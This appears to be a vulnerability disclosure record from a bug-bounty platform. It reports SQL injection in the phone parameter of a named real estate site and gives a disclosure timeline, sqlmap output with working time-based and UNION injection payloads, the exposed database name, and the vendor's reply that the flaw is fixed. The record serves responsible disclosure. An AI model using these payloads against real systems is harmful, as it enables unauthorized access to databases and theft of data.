2015-10-03: Details reported to the vendor, awaiting vendor handling
2015-10-06: Vendor confirmed the issue; details disclosed to the vendor only
2015-10-16: Details disclosed to core white hats and relevant domain experts
2015-10-26: Details disclosed to regular white hats
2015-11-05: Details disclosed to intern white hats
2015-11-20: Details disclosed to the public
http://fang.hualongxiang.com/find/2?phone=555-666-0606
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: phone (GET)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: phone=555-666-0606';(SELECT * FROM (SELECT(SLEEP(5)))aDow)#

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: phone=555-666-0606' UNION ALL SELECT CONCAT(0x7162626b71,0x457453705159534c694c,0x7170766271),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
back-end DBMS: MySQL 5.0.11
Database: hlxapp
[240 tables]
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-10-06 16:01
Vendor reply: Thank you for your attention to Hualongxiang's security. The vulnerability is confirmed and has now been fixed!